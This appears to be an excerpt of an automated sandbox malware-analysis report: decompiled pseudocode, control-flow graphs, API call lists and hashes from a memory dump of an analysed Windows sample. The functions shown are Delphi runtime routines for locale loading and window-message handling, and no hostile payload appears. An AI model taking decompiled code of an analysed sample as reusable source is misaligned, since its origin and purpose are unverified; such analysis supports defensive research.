                                                    0x00406231
                                                    0x00406246
                                                    0x0040624d
                                                    0x004062dc
                                                    0x004062e4
                                                    0x004062eb
                                                    0x004062ec
                                                    0x004062ff
                                                    0x00406304
                                                    0x0040630d
                                                    0x00406323
                                                    0x00406329
                                                    0x0040632a
                                                    0x00406337
                                                    0x0040633c
                                                    0x0040633b
                                                    0x0040633b
                                                    0x0040634b
                                                    0x00406353
                                                    0x00406359
                                                    0x0040635e
                                                    0x0040636b
                                                    0x0040636f
                                                    0x00406370
                                                    0x00406371
                                                    0x00406386
                                                    0x00406386
                                                    0x0040638a
                                                    0x004063a3
                                                    0x004063a7
                                                    0x004063a8
                                                    0x004063a9
                                                    0x004063b9
                                                    0x004063be
                                                    0x004063c2
                                                    0x004063c4
                                                    0x004063d9
                                                    0x004063dd
                                                    0x004063de
                                                    0x004063df
                                                    0x004063ef
                                                    0x004063f4
                                                    0x004063f4
                                                    0x004063c2
                                                    0x0040638a
                                                    0x00406353
                                                    0x004063fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040624d
                                                    0x0040622f

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                    • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                    • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1759228003-2375825460
                                                    • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                    • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00459934 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 25 459934-459968 26 45999c-4599b1 call 4597e8 25->26 27 45996a-45996b 25->27 33 459a65-459a6a 26->33 34 4599b7 26->34 28 45996d-459989 call 41ac6c 27->28 53 459998-45999a 28->53 54 45998b-459993 28->54 37 459a6c 33->37 38 459abb-459ac0 33->38 35 459f03-459f18 call 45aae4 34->35 36 4599bd-4599c0 34->36 60 459fe4-459fec 35->60 39 4599c2 36->39 40 459a2c-459a2f 36->40 45 459a72-459a77 37->45 46 459ddb-459de3 37->46 42 459ae1-459ae6 38->42 43 459ac2 38->43 49 459cc8-459ccf 39->49 50 4599c8-4599cb 39->50 51 459a31 40->51 52 459a4e-459a51 40->52 58 459f56-459f5d 42->58 59 459aec-459af2 42->59 55 459f1d-459f24 43->55 56 459ac8-459acd 43->56 47 459aa2-459aa7 45->47 48 459a79 45->48 46->60 61 459de9-459df4 call 441704 46->61 66 459aad-459ab0 47->66 67 459e9c-459ea7 47->67 63 459e74-459e7f 48->63 64 459a7f-459a84 48->64 49->60 70 459cd5-459cdf 49->70 75 4599d1 50->75 76 459fdd-459fde call 4598ac 50->76 77 459fa7-459fb8 call 458dec call 4598ac 51->77 78 459a37-459a3a 51->78 79 459a57-459a5a 52->79 80 459b93-459ba1 call 45a038 52->80 53->26 53->28 65 45a003-45a009 54->65 81 459f26-459f39 call 45a5a4 55->81 82 459f3e-459f51 call 45a600 55->82 71 459ec4-459ed2 IsIconic 56->71 72 459ad3-459ad6 56->72 68 459f70-459f7f 58->68 69 459f5f-459f6e 58->69 73 459d98-459db4 call 45ba10 59->73 74 459af8 59->74 60->65 61->60 104 459dfa-459e09 call 441704 IsWindowEnabled 61->104 63->60 91 459e85-459e97 63->91 85 459a86-459a8c 64->85 86 459afd-459b0d 64->86 88 459ab6 66->88 89 459db9-459dc6 call 45a47c 66->89 67->60 93 459ead-459ebf 67->93 68->60 69->60 70->60 71->60 94 459ed8-459ee3 GetFocus 71->94 72->35 90 459adc 72->90 73->60 74->76 75->40 102 459fe3 76->102 77->60 96 459f81-459fa5 call 445ed0 call 459840 call 4598ac 78->96 97 459a40-459a43 78->97 98 459ce4-459cf0 79->98 99 459a60 79->99 80->60 81->60 82->60 105 459a92-459a97 85->105 106 459c9c-459cc3 SendMessageA 85->106 110 459b0f-459b14 86->110 111 459b18-459b20 call 45a054 86->111 88->76 89->60 144 459dcc-459dd6 89->144 90->76 91->60 93->60 94->60 113 459ee9-459ef2 call 451750 94->113 96->60 115 459bc7-459be8 call 4598ac 97->115 116 459a49 97->116 98->60 109 459cf6-459d00 98->109 99->76 102->60 104->60 147 459e0f-459e1e call 441704 IsWindowVisible 104->147 121 459a9d 105->121 122 459fba-459fc6 call 4328f8 call 4329d8 105->122 106->60 109->60 124 459d06-459d10 109->124 126 459b25-459b2d call 45a104 110->126 127 459b16-459b39 call 4598ac 110->127 111->60 113->60 153 459ef8-459efe SetFocus 113->153 145 459c0c-459c29 call 45973c PostMessageA 115->145 146 459bea-459c07 call 45974c PostMessageA 115->146 116->76 121->76 122->60 170 459fc8-459fd2 call 4328f8 call 432a34 122->170 136 459d12-459d2e call 40edc4 124->136 137 459d8b-459d93 124->137 126->60 127->60 165 459d70-459d86 GetLastError 136->165 166 459d30-459d52 GetProcAddress 136->166 137->60 144->60 145->60 146->60 147->60 168 459e24-459e6f GetFocus call 441704 SetFocus call 43c130 SetFocus 147->168 153->60 165->60 166->60 169 459d58-459d6b 166->169 168->60 169->60 170->60
                                                    C-Code - Quality: 94%
                                                    			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x459fee);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E004597E8(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E004598AC(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00451750(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00441704(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00441704(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00441704(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x49be6c = 0;
											_t206 = GetFocus();
											SetFocus(E00441704(_t372));
											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x49be6c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0045A47C(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0045A054(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0045A104(_v8);
								} else {
									E004598AC(_t377);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E004329D8(E004328F8());
							__eflags = _t247;
							if(_t247 != 0) {
								E00432A34(E004328F8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0045A038(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x49ebbc; // 0x0
							E00458DEC(_t272);
							E004598AC(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x49ddb0; // 0x49eb18
							E00445ED0( *_t276, _t317,  *(_v12 + 4));
							E00459840(_v8, _t308, _t317, _v12, _t370);
							E004598AC(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004598AC(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0045973C();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0045974C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
						case 0:
							0 = E004214B8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407848();
							__eax = E004598AC(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004598AC(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00459744();
							} else {
								_v8 = E0045974C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004598AC(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077A8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004598AC(__ebp);
							} else {
								__eax = E004598E8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00456FEC(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004598AC(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                                    0x00459934
                                                    0x0045993b
                                                    0x0045993d
                                                    0x00459940
                                                    0x00459945
                                                    0x00459946
                                                    0x0045994b
                                                    0x0045994e
                                                    0x00459956
                                                    0x00459965
                                                    0x00459968
                                                    0x0045999c
                                                    0x004599a2
                                                    0x004599aa
                                                    0x004599ac
                                                    0x004599ae
                                                    0x004599b1
                                                    0x00459a65
                                                    0x00459a6a
                                                    0x00459abb
                                                    0x00459ac0
                                                    0x00459ae1
                                                    0x00459ae1
                                                    0x00459ae6
                                                    0x00459f56
                                                    0x00459f59
                                                    0x00459f5d
                                                    0x00459f79
                                                    0x00459f5f
                                                    0x00459f6b
                                                    0x00459f6b
                                                    0x00459fe4
                                                    0x00459fe4
                                                    0x00459fe6
                                                    0x00459fe9
                                                    0x00000000
                                                    0x00459fe9
                                                    0x00459aef
                                                    0x00459af2
                                                    0x00459db1
                                                    0x00459af8
                                                    0x00459fdd
                                                    0x00459fde
                                                    0x00459fe3
                                                    0x00000000
                                                    0x00459af2
                                                    0x00459ac2
                                                    0x00459f1d
                                                    0x00459f20
                                                    0x00459f24
                                                    0x00459f4c
                                                    0x00459f26
                                                    0x00459f34
                                                    0x00459f34
                                                    0x00000000
                                                    0x00459f24
                                                    0x00459ac8
                                                    0x00459ac8
                                                    0x00459acd
                                                    0x00459ecb
                                                    0x00459ed0
                                                    0x00459ed2
                                                    0x00459ed8
                                                    0x00459edd
                                                    0x00459ee0
                                                    0x00459ee3
                                                    0x00459eeb
                                                    0x00459ef0
                                                    0x00459ef2
                                                    0x00459ef9
                                                    0x00459ef9
                                                    0x00459ef2
                                                    0x00459ee3
                                                    0x00000000
                                                    0x00459ed2
                                                    0x00459ad3
                                                    0x00459ad6
                                                    0x00459f03
                                                    0x00459f13
                                                    0x00000000
                                                    0x00459adc
                                                    0x00000000
                                                    0x00459adc
                                                    0x00459ad6
                                                    0x00459a6c
                                                    0x00459dde
                                                    0x00459de1
                                                    0x00459de3
                                                    0x00459de9
                                                    0x00459ded
                                                    0x00459df2
                                                    0x00459df4
                                                    0x00459e02
                                                    0x00459e07
                                                    0x00459e09
                                                    0x00459e17
                                                    0x00459e1c
                                                    0x00459e1e
                                                    0x00459e24
                                                    0x00459e2b
                                                    0x00459e3a
                                                    0x00459e53
                                                    0x00459e59
                                                    0x00459e5e
                                                    0x00459e68
                                                    0x00459e68
                                                    0x00459e1e
                                                    0x00459e09
                                                    0x00459df4
                                                    0x00000000
                                                    0x00459de3
                                                    0x00459a72
                                                    0x00459a77
                                                    0x00459aa2
                                                    0x00459aa2
                                                    0x00459aa7
                                                    0x00459e9c
                                                    0x00459e9f
                                                    0x00459ea7
                                                    0x00459eb9
                                                    0x00459eb9
                                                    0x00000000
                                                    0x00459ea7
                                                    0x00459aad
                                                    0x00459ab0
                                                    0x00459dbf
                                                    0x00459dc4
                                                    0x00459dc6
                                                    0x00459dcf
                                                    0x00459dcf
                                                    0x00000000
                                                    0x00459ab6
                                                    0x00000000
                                                    0x00459ab6
                                                    0x00459ab0
                                                    0x00459a79
                                                    0x00459e74
                                                    0x00459e77
                                                    0x00459e7f
                                                    0x00459e91
                                                    0x00459e91
                                                    0x00000000
                                                    0x00459e7f
                                                    0x00459a7f
                                                    0x00459a7f
                                                    0x00459a84
                                                    0x00459b08
                                                    0x00459b08
                                                    0x00459b0d
                                                    0x00459b1b
                                                    0x00459b0f
                                                    0x00459b0f
                                                    0x00459b14
                                                    0x00459b28
                                                    0x00459b16
                                                    0x00459b33
                                                    0x00459b38
                                                    0x00459b14
                                                    0x00000000
                                                    0x00459b0d
                                                    0x00459a89
                                                    0x00459a89
                                                    0x00459a8c
                                                    0x00459cc0
                                                    0x00000000
                                                    0x00459cc0
                                                    0x00459a92
                                                    0x00459a97
                                                    0x00459fbf
                                                    0x00459fc4
                                                    0x00459fc6
                                                    0x00459fcd
                                                    0x00459fcd
                                                    0x00000000
                                                    0x00459a9d
                                                    0x00000000
                                                    0x00459a9d
                                                    0x00459a97
                                                    0x004599b7
                                                    0x00000000
                                                    0x00000000
                                                    0x004599bd
                                                    0x004599c0
                                                    0x00459a2c
                                                    0x00459a2f
                                                    0x00459a4e
                                                    0x00459a4e
                                                    0x00459a51
                                                    0x00459b9e
                                                    0x00000000
                                                    0x00459b9e
                                                    0x00459a57
                                                    0x00459a5a
                                                    0x00459ce4
                                                    0x00459cea
                                                    0x00459cf0
                                                    0x00459cf6
                                                    0x00459cf9
                                                    0x00459d00
                                                    0x00459d06
                                                    0x00459d09
                                                    0x00459d10
                                                    0x00459d90
                                                    0x00459d12
                                                    0x00459d21
                                                    0x00459d26
                                                    0x00459d2c
                                                    0x00459d2e
                                                    0x00459d78
                                                    0x00459d80
                                                    0x00459d30
                                                    0x00459d35
                                                    0x00459d4c
                                                    0x00459d4e
                                                    0x00459d50
                                                    0x00459d52
                                                    0x00459d5b
                                                    0x00459d69
                                                    0x00459d69
                                                    0x00459d52
                                                    0x00459d2e
                                                    0x00459d10
                                                    0x00459d00
                                                    0x00000000
                                                    0x00459a60
                                                    0x00000000
                                                    0x00459a60
                                                    0x00459a5a
                                                    0x00459a31
                                                    0x00459fa7
                                                    0x00459fac
                                                    0x00459fb2
                                                    0x00000000
                                                    0x00459fb7
                                                    0x00459a37
                                                    0x00459a37
                                                    0x00459a3a
                                                    0x00459f87
                                                    0x00459f8e
                                                    0x00459f99
                                                    0x00459f9f
                                                    0x00000000
                                                    0x00459fa4
                                                    0x00459a40
                                                    0x00459a43
                                                    0x00459bc8
                                                    0x00459bce
                                                    0x00459bd1
                                                    0x00459bd5
                                                    0x00459bdb
                                                    0x00459be1
                                                    0x00459be4
                                                    0x00459be8
                                                    0x00459c0f
                                                    0x00459c24
                                                    0x00459bea
                                                    0x00459bed
                                                    0x00459c02
                                                    0x00459c02
                                                    0x00000000
                                                    0x00459a49
                                                    0x00000000
                                                    0x00459a49
                                                    0x00459a43
                                                    0x004599c2
                                                    0x00459cc8
                                                    0x00459ccb
                                                    0x00459ccf
                                                    0x00459cd8
                                                    0x00459cd8
                                                    0x00000000
                                                    0x00459ccf
                                                    0x004599c8
                                                    0x004599cb
                                                    0x00000000
                                                    0x00000000
                                                    0x004599d1
                                                    0x00000000
                                                    0x00459fd6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00459ba6
                                                    0x00459ba8
                                                    0x00459baa
                                                    0x00459bb2
                                                    0x00459bb5
                                                    0x00459bb6
                                                    0x00459bbc
                                                    0x00000000
                                                    0x00000000
                                                    0x00459c2e
                                                    0x00459c31
                                                    0x00459c35
                                                    0x00459c69
                                                    0x00459c6f
                                                    0x00459c72
                                                    0x00459c79
                                                    0x00459c7b
                                                    0x00459c7e
                                                    0x00459c81
                                                    0x00459c86
                                                    0x00459c89
                                                    0x00459c89
                                                    0x00459c92
                                                    0x00459c37
                                                    0x00459c3a
                                                    0x00459c3f
                                                    0x00459c42
                                                    0x00459c48
                                                    0x00459c4a
                                                    0x00459c51
                                                    0x00459c54
                                                    0x00459c54
                                                    0x00459c56
                                                    0x00459c56
                                                    0x00459c5d
                                                    0x00459c62
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b56
                                                    0x00459b59
                                                    0x00459b5c
                                                    0x00459b5d
                                                    0x00459b62
                                                    0x00459b64
                                                    0x00459b73
                                                    0x00459b66
                                                    0x00459b67
                                                    0x00459b6c
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b3e
                                                    0x00459b41
                                                    0x00459b44
                                                    0x00459b46
                                                    0x00459b4c
                                                    0x00459b4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b7e
                                                    0x00459b81
                                                    0x00459b88
                                                    0x00000000
                                                    0x00000000
                                                    0x0045996a
                                                    0x0045996a
                                                    0x0045996b
                                                    0x00000000
                                                    0x0045996d
                                                    0x00459989
                                                    0x00000000
                                                    0x0045998b
                                                    0x0045998b
                                                    0x0045998d
                                                    0x00459990
                                                    0x00459990
                                                    0x0045a003
                                                    0x0045a009
                                                    0x00459998
                                                    0x00459998
                                                    0x00459999
                                                    0x00459999
                                                    0x0045999a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0045999a

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                    • API String ID: 0-2963190186
